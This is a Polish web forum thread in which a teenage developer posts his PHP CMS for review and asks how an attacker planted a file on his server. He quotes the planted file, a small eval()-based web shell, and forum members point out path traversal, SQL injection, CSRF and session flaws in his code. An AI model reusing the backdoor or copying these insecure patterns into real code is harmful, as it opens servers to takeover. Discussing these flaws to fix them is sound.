Na pewno go jeszcze poprawię i przepiszę ale czy możecie mi powiedzieć chociaż o co chodzi z tym atakiem, stworzeniem pliku i uprawnieniami? Jakim cudem ktoś stworzył plik php na moim serwerze? Prawa do pliku były o ile pamiętam 755. Jedyne dane jakie przesyłają się do skryptu to id

skoro masz z tym problemy to proszę zmień tą "stopke"?

i ogólnie zamiast się posłuchać doświadczonych brniesz w nie wiadomo co, opierasz cms na plikach co to ma być? nawet znikomego mv nie mozna sie dopatrzeć
moja rada jest taka weź się solidnie za naukę i pochwal się dopiero czymś co będzie miało "ręce i nogi"

Ten CMS to dopiero przymiarka. Oczywiście napiszę drugiego, porządnego ale chcę widzieć jakie błędy są w tym. A właśnie jakiś jest i to poważny o którym chce się właśnie dowiedzieć

Edit: Myśle że drugi cms napisze obiektowo. Zobacze co z tego wyniknie

Cały ten "CMS" to jeden wielki błąd. Nie rozumiesz tego? Cały kod jaki napisałeś, pozwala na wszytko i jeszcze więcej, bo nie użyłeś żadnych zabezpieczeń, a jak już to zrobiłeś to źle, więc czego Ty chcesz teraz? Wskazaliśmy co jest nie tak i nadal nie rozumiesz? wszystkie 154 linijki tego co napisałeś, było podatne na atak, mamy Ci wkleić tu Twój własny kod? Bez przesady...



Nie znasz podstaw PHP, a chcesz się za OOP brać?

Możesz podać przykład tego ataku?

edit: a może to było przy strip_tagsach? Jeśli ustawiłem źle uprawnienia to może jakimś cudem nadpisał plik txt, przez co zmienił sprawdzanie w tablicy i warunek if był spełniony. Dzięki temu wykonał kod PHP?

edit2: Jak mam nauczyć się podstaw PHP jak już umię. Nie wiem dlaczego nie napisałem tego CMS obiektowo. Oczywiście w następnej bezpiecznej wersji wprowadzę obiekty, nie będzie plików txt tylko baza danych.

Najpierw proponuję nauczyć się podstaw języka polskiego. Jak sam nie wiesz czemu nie napisałeś tego "CMSa" obiektowo to nikt z użytkowników też nie wie (chociaż ja podejrzewam brak umiejętności). Ja jeszcze dodatkowo nie wiem czemu zamiast bazy danych korzystałeś z plików tekstowych. Używanie relacyjnych baz danych zamiast pierwszych z wymienionych ma same plusy i zero minusów. Proponuję na początek podjąć się jakiegoś łatwiejszego zadania, np. napisanie strony w PHP.

Nie, bo niby skąd mam wiedzieć jaki to był? Jest ich dużo i większość by pasowała, poszukaj ich w google, są lepiej opisane, niż wypociny kogokolwiek tu na forum.


12 latek nie umie PHP, 12 latek umie zapisać plik z rozszerzeniem *.php ale nic ponad to.
Przestań się przy tym upierać.


Minusami mogą być też ataki jak tego nie zabezpieczy

...

A plików tekstowych to niby nie można atakować? To nie jest żaden minus.

Od dawna nikt mi nie powiedział "12 latek". Na prawdę. Jak już tak chcecie widzieć to mam 16 lat.

Pierwsze projekt zakładał bazę danych jednak zrezygnowałem z tego rozwiązania z powodu tego że praktycznie były tam 2 dane - login i hasło. Nic poza tym. Do tego zakładam prostotę CMSa - nie każdy w ogóle wie co to jest baza, a tym bardziej jak się z nią połączyć.



Chociaż jeden link proszę.



To żart prawda?



Też poproszę o chociaż jeden link

Nie. Twoje wszystkie skrypty są na poziomie przepisania "hello world" z kursu i to w dodatku z błędem, dlatego nie można powiedzieć ze coś potrafisz, po za ich zapisaniem do pliku.



Link + metody ataku php


A artykuły to niby gdzie masz trzymać? Logiczne że w bazie danych a nie plikach, jest rok 2012, a nie 1990. Klienta końcowego nie obchodzi to czy jest na plikach czy bazie, bo od tego jest CMS aby odwalać z automatu większość rzeczy. CMS na plikach jest skazany na porażkę, nawet gdyby Ci go napisał sam Bill G, a wypromował duch S. Jobsa.

uw-team.org, tylko następnym razem sobie sam poszukaj.

uw-team? Znam to. Ale ten sposób "ataków" i te całe jego wideo to jedynie ucinek tego co oferuje wpisanie w google ataki na php. Więc te jego metody znam wszystkie i jeszcze więcej.

Co do wypowiedzi poniżej - już dał mi ktoś link do tej stronki (google) więc wolałbym coś innego

Miszczu ty mój!

Nie słychać.

[SQL] pobierz, plaintext 
SELECT admin_login,admin_pass FROM admin_pass WHERE admin_id=1
[SQL] pobierz, plaintext 

Świetne podejście, po co komu dwóch administratorów CMSie. Nie potrafisz użyć bazy danych.

Z CMS zrobiło się udowadnianie mojego wieku

Przejdźmy do rzeczy. Czy po wpisaniu do zmiennej ID wszystko jedno czego oprócz treści zawartej w tablicy i pliku txt wyświetli się błąd? Bo wg. mnie tak.

Z tego co wiem aby utworzyć plik na serwerze włamywacz użył dwóch funkcji - eval() i system() - tylko gdzie je wpisał? Jedynie można je wpisać w id gdzie przecież jest filtrowanie

materkamil, trochę pokory i przede wszystkim szacunku dla tych, którzy poświęcają swój czas na wytknięcie Ci masy błędów - zamiast napisać "daj sobie spokój" lub "zapoznaj się z podstawami, zanim zaczniesz pisać". Szczerze powiedziawszy podziwiam piszących tutaj, że są tak opanowani. Najpierw prosisz o ocenę, a potem stwierdzasz, że Twój kod jest "cacy", no litości .

Wierz w to lub nie, wnioskując po poziomie Twojego kodu, dopiero co zaczynasz swoją przygodę z PHP. Wiem, że wydaje Ci się, że podstawy masz już daleko za sobą, ale z przykrością stwierdzam, że tak nie jest.

Podsumowując, zrewiduj proszę swoje podejście do tego tematu i uwag, jakie w nim otrzymujesz.

Wiem że kod jest jeszcze bardzo "zmasakrowany" ale zależy mi głównie jedynie na jednej odpowiedzi:



Bo właśnie nie wiem jakim cudem stworzono plik z wykorzystaniem zmiennej ID

Najwidoczniej było słabo filtrowane;

Ogólny schemat:

[PHP] pobierz, plaintext 
$x = fread($otwarty,filesize("nazwa.txt"));
$array = explode("|",$x); // Zapisanie tego z pliku do tablicy. Będą tu nazwy kategorii
 
//Teraz id
 
if($_GET["id"] == $array[0]) {
include($_GET["id"].".txt");
}
else
{
}
[PHP] pobierz, plaintext 

Id nie było wykorzystywane nigdzie, jedynie do warunku if. Jedyne dane jakie można przesłać do strony to właśnie dzięki ID. I to właśnie dzięki temu nastąpił atak. Gdzie tu jest błąd w ogólnym założeniu działania?

Wystarczy spreparować plik o takiej samej nazwie.

Ale jak przesłać taki utworzony plik na mój serwer lub go utworzyć?

W ogóle nie była utworzona taka kategoria, jak nazwa tego (fi.php)

[PHP] pobierz, plaintext 
<?
echo time();
eval($_POST[txt]);
?>
[PHP] pobierz, plaintext 

Jakim cudem takie coś znalazło się na moim serwerze?

Niktoś, możesz coś więcej o tym powiedzieć



Plik o tej samej nazwie? Ale jak go przesłać. Do tego już istnieje taki plik

Nie wiem ,może curlem to przesłał, może da rady to zrobić bezpośrednio w przeglądarce.
Jedno wiem,że ten schemtat co pokazałeś wyżej, wogóle nie jest zabezpieczony.
Nawet nie sprawdzasz skąd otwierany plik pochodzi.
Gdzie masz sprawdzanie typu mime i rozszerzeń?Include do plików to zły pomysł,może i najgorszy- do tego służy fopen.

Napisałem taki ogólnie schemat. Dokładnie jest tak:

[PHP] pobierz, plaintext 
include('strona/'.$_GET["strony"].''.txt);
[PHP] pobierz, plaintext 

więc ogranicza się to do katalogu strona. Dodam że plik nie był jednak w tym katalogu lecz w głównym katalogu skryptu

A zapoznałeś się z kodem jaki dał Ci rocktech.pl myślę że coś może być na rzeczy. Poza tym, dlaczego uważasz że to się ogranicza tylko do katalogu? Zauważ że tam można wpisać wszytko.

Nic bardziej mylnego. Przy założeniu, że $_GET['strony'] to np. "blah" masz rację. Będzie to strona/blah.txt. Jednak jeśli będzie to "../blah" to spróbuje wczytać plik nie z katalogu strona, ale z katalogu wyżej.

Nie wiem czy kod rocktecha.pl coś tu da, bo przecież aby coś wykonać na skrypcie trzeba mieć sesję. A sesję dostaje się tylko przez logowanie. Przy wysłaniu takiego czegoś jak rocktech.pl pojawi się po prostu komunikat o braku dostępu i prośbie o zalogowanie się.

Do tego żadne dane i nic innego nie było zmienione. Wszystko praktycznie ok tylko plik nowy.

Nie, nie można wpisać wszystko. Jak wpiszesz np: krowa to wyświetli ci błąd na sprawdzaniu if. Można tam jedynie wpisać to co jest w tabeli (jedno słowo praktycznie)

edit; @up - tak, można wyjść z katalogu ale operując na moim serwerze, bez zewnętrznych odwołań do http które w braku /katalog było by możliwe

To wyczerpuje temat. Można zamknąć.

Czyli co zrobić? Do id władować htmlspecialchars?

PS: Tematu jeszcze nie zamykajcie bo za niedługo jak napiszę piękny (z <?php ) drugi CMS poprawkowy to wtedy zerkniecie na kod

Nie, wystarczy jak zmienisz sposób wczytywania plików. Pobierz GET, wrzuć to do switch i sprawdzaj po nazwie. Oczywiście wcześniej GET przefiltruj czymś, trim, preg_mach strlen basename czymkolwiek.

Ok, przefiltruję. Ale teraz jeszcze takie jedno na boku pytanie. Po co?
Przecież te dane nigdzie nie idą i tylko sprawdzają się na ifie?

PS: Oczywiście użyję filtrowania preg_match

Właśnie po to żeby Ci nikt serwisów z serwera nie kasował, wgrywając swoje pliki czy zmieniając Twoje.

Na początek proponuję ten artykuł-bo bezpośrednio Ciebie dotyczy.
http://www.pomocnikwebmastera.pl/bezpiecze...a-pasku-adresu/

Dodatkowo sprawdzaj typ mime pliku ,który wczytujesz, oraz za pomocą $_server porównuj ściężki plików skąd zostały wczytane.

Trochę nudno się powtarzać.

!*! - wgrywając swoje pliki??

Proszę powiedz co masz na myśli i jak da się wgrać swój plik na serwer poprzez id?

Niktoś: ten artykuł nie pasuje do mnie bo tam jest bezpośrednie includowanie

include($_GET["id"]);

a takiego czegoś bym w życiu nie zrobił.

Czyli ten if nie działa jak preg_match?

O ile zmienna GET, będzie jednocześnie nazwą pliku (co już jest błędem), w innych przypadkach to olej.



Dziwne, bo zrobiłeś dokładnie to samo.


A kto Ci takich bzdur naopowiadał?

No bo preg_match może sprawdzać np: pod kątem cyfr i znaków specjalnych. Jeśli zmienna je posiada to jest błąd.

A ten if? Też sprawdza. No bo przecież nie wykona się includowanie jak GET będzie miał znaki specjalne i cyfry bo przecież sprawdza się na ifie.

I jeszcze jedno. Możesz powiedzieć jak przy takim includowaniu można stworzyć własny plik? Bez odwołania do innego serwera

Kończę, wszystko już zostało powiedziane, nawet dwa razy, przeanalizuj temat.

Napisałem kod drugi raz. Zastosowałem się do rad, użyłem ' zamiast ", zastosowałem nie pliki tekstowe tylko bazę danych i dokładniej sprawdzanie danych. Oto kod:

http://wrzucacz.pl/file/2971340312059

W środku jest paczka do bazy danych. Strona ta jest zamieszczona tu:

http://www.materdefense.hostzi.com/matercmsv2

Jak by ktoś chciał ją przetestować w działaniu. Czy teraz skrypt jest bezpieczny? Co o tym sądzicie?

Edit: Na razie nie zwracajcie uwagę na kodowanie, jutro to naprawię

Nie.

[PHP] pobierz, plaintext 
if(preg_match('/^[0-9a-z_]{1,25}$/',$_GET['id'])) {
	if($_GET['id'] == $kategorie['1'] || $_GET['id'] == $kategorie['2'] || $_GET['id'] == $kategorie['3'] || $_GET['id'] == $kategorie['4'] || $_GET['id'] == $kategorie['5']) {
		include('kategorie/'.$_GET['id'].'.txt');
	}
	else
	{
		include('kategorie/'.$kategorie['1'].'.txt');
	}
}
else
{
	include('kategorie/'.$kategorie['1'].'.txt');
}
[PHP] pobierz, plaintext 

Sprawdzanie tych id nadal powala... po co GET ma być nazwą pliku? Masz bazę, to z niej korzystaj.

[PHP] pobierz, plaintext 
if($pasekboczny['wartosc'] == 'tak') { // Nadawanie wartoœci tabeli bez paska i z paskiem
	$pasekboczny_spr = 627;
} else
{
	$pasekboczny_spr = 920;
}
[PHP] pobierz, plaintext 

Co to jest?

[PHP] pobierz, plaintext 
$login = addslashes($_POST['login']);
$haslo = addslashes($_POST['haslo']);
$ip = $_SERVER['REMOTE_ADDR'];
 
mysql_query("INSERT INTO logi SET login='$login', haslo='$haslo', ip='$ip'");
[PHP] pobierz, plaintext 

Niczego tu nie sprawdzasz? mysql_* nie jest bezpieczny sam w sobie, wycofują go zresztą, użyj PDO.

[PHP] pobierz, plaintext 
if($_SESSION['logowanie'] == 2) {
[PHP] pobierz, plaintext 

Czyli wystarczy utworzyć sesje i już jestem w panelu? Fajnie.

[PHP] pobierz, plaintext 
if(isset($_POST['k1']) && isset($_POST['k2']) && isset($_POST['k3']) && isset($_POST['k4']) && isset($_POST['k5'])) {
 
	$k1 = addslashes($_POST['k1']);
	$k2 = addslashes($_POST['k2']);
	$k3 = addslashes($_POST['k3']);
	$k4 = addslashes($_POST['k4']);
	$k5 = addslashes($_POST['k5']);
	$q = 'UPDATE kategorie SET k1=\''.$k1.'\', k2=\''.$k2.'\', k3=\''.$k3.'\', k4=\''.$k4.'\', k5=\''.$k5.'\' WHERE id=1';
	mysql_query($q);
	echo('<c><center>Polecenie wydane do bazy danych: <br>'.$q.'</center></c>');
	// Tworzenie plików kategorii
 
	$k1 = fopen('../kategorie/'.$k1.'.txt','w');
	fwrite($k1,'Utworzono kategorię');
 
	$k2 = fopen('../kategorie/'.$k2.'.txt','w');
	fwrite($k2,'Utworzono kategorię');
 
	$k3 = fopen('../kategorie/'.$k3.'.txt','w');
	fwrite($k3,'Utworzono kategorię');
 
	$k4 = fopen('../kategorie/'.$k4.'.txt','w');
	fwrite($k4,'Utworzono kategorię');
 
	$k5 = fopen('../kategorie/'.$k5.'.txt','w');
	fwrite($k5,'Utworzono kategorię');
}
 
if(isset($_POST['kasuj']) && $_POST['kasuj'] == 'tak') {
	$w = 'SELECT * from kategorie WHERE id=1';
	$query = mysql_query($w); // Wyciągnięcie nazwy kategorii
	$tresc = mysql_fetch_array($query); // Zapisanie nazw do tablicy
 
	$kategorii = 5;
	while($kategorii > 0) { // Pętla kasująca 5 plików kategorii
	unlink('../kategorie/'.$tresc[$kategorii].'.txt');
	$kategorii = $kategorii-1;
	}
 
} // Koniec
[PHP] pobierz, plaintext 

To przy optymalności nawet nie stoi i nie wymaga komentarza, może inni.

Powiedz mi, czemu mysql_* nie jest bezpieczne? Czy PDO, MySQLi i mysql_* to nie jest tylko interfejs dla wywoływania komend SQL.


A jak to powinno być rozwiązane, jeśli nie przez sesje? Owszem, podatne jest to na CSRF oraz prawdopodobnie Session Poisoning (shared hostng, ustwaiamy id sesji oraz zmienną sesyjną logowanie=2).

Bindowanie PDO, z góry narzuca dane jakie mają być wysłane do bazy i samemu je sobie dokleja do zapytania. mysql* robi to ręcznie, tak jak My zbudujemy zapytanie. Twoim zdaniem kod, wyżej jest zabezpieczony?


Brakuje chociażby kilku dodatkowych warunków do sprawdzenia, ip, uu i sprawdzenie czasu.

Co nie zmienia faktu, że nie jest niebezpieczny, a jak ktoś chce, to nawet w PDO nie będzie używał bindowania.

Co jeśli mam zmienne IP? UU - chodziło o user-agent? Jeśli tak to prawda. Czas - chodzi o wygaśnięcie sesji czy coś innego?

To znaczy że jest złym człowiekiem, albo wie co robi.

A Ty przypadkiem nie piszesz z multi konta?


IP nie zmienia się w trakcie połączenia. Tak user agent i czas wygaśniecia, np. sesja trwa 15min jak więcej > wylogowanie.

Skąd takie podejrzenia?


Być może z tym IP wtopa. Co do 15min trwania sesji, chodziło chyba od ostatniej akcji, nie od rozpoczęcia jej?

Co do CSRF, jest to podatne, jednak trzeba się znać żeby to przeprowadzić bo ważniejsze dane przekazywane są postem więc tutaj aby to rozwalić trzeba użyć biblioteki curl.

Z session poisoning to nie za bardzo wiem jak zrobić aby zabezpieczyć to tak globalnie. Najlepiej jest zmienić wartość sesji z 2 na jakąś unikalną nazwę jednak tak powiem ja i inni znający PHP. Zwykły człowiek raczej nie zrobi takiego czegoś.

Co do pasek boczny i te dwie liczby 920 i 767 - jest to wymiar tabeli. Jeśli jest pasek boczny włączony - tabela ma 727, jeśli nie to 920

Ale ktoś kto chce Ci rozwalić stronę, skasować czy wykraść dane, to nie zwykły człowiek.


Takie rzeczy to sie w CSS robi.

Nie, nie trzeba.



Zatruwać sesje może sobie każdy, kto ma dostęp do plików sesji.

Tak teraz sobie patrzę na Twój podpis:


Jak Ty chcesz prowadzić stronę o bezpieczeństwie komputerowym, skoro nie masz o tym najmniejszego pojęcia?

też bym tak chciał..

no będzie że się czepiam ale POKORY troche więcej okaż bo naprawdę takiego cocky "znawcy" dawno nie widziałem.

Ostatnimi czasy nie musze czytać dowcipów, wystarcza mi ten temat na forum ...

[SQL] pobierz, plaintext 
CREATE TABLE `kategorie` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `k1` text NOT NULL,
  `k2` text NOT NULL,
  `k3` text NOT NULL,
  `k4` text NOT NULL,
  `k5` text NOT NULL,
  PRIMARY KEY  (`id`)
) TYPE=MyISAM AUTO_INCREMENT=2 ;
[SQL] pobierz, plaintext 

Czyli mogę mieć tylko 5 kategorii ?

PS: nie lepiej było zrobić tak, że każdy rekord to kategoria ?

a slyszal o in_array() ? lub petli? lub wieksze mniejsze <>? o int? jesli id to cyfra? o... jesli nie cyfra to id tu nie pasuje...

Ostatnio jakas moda na cmsy weszla tak jak dawniej na fora i gry... kazdy musial miec swoje...

p.s. fajnie ze sie uczysz itd.. ale ogladalem Twoja jedna lekcje kursu na yt to sie troche posmialem, moze najpierw sam sie troche z php zapoznaj a pozniej ucz innych, bez urazy

Drodzy użytkownicy forum. Musicie wziąć pod uwagę jedną ważną kwestię!.

Chłopak stara się robić coś dla swoich rówieśników bo ich WYPRZEDZA ! - Bezpieczeństwo dla 13 latka a osoby dorosłej to 2 różne rzeczy.



btw. Jest odważny jak cholera, ja z głosem przed mutacją bałem się wejść na TS'a.